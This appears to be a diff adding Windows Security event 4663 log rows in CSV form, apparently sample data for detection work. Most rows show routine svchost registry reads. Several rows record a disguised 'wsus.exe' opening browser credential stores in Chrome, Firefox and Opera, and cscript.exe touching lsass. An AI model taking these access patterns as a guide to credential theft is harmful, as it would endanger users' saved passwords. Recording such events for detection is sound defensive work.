+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452919
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452918
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452917
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452916
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452915
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452914
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452913
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452912
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452911
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452910
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452909
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452908
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452907
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452906
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452905
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452904
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452903
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452902
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452901
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452900
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452899
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452898
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452897
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452896
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452895
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452894
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452893
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452892
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452891
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452890
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452889
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
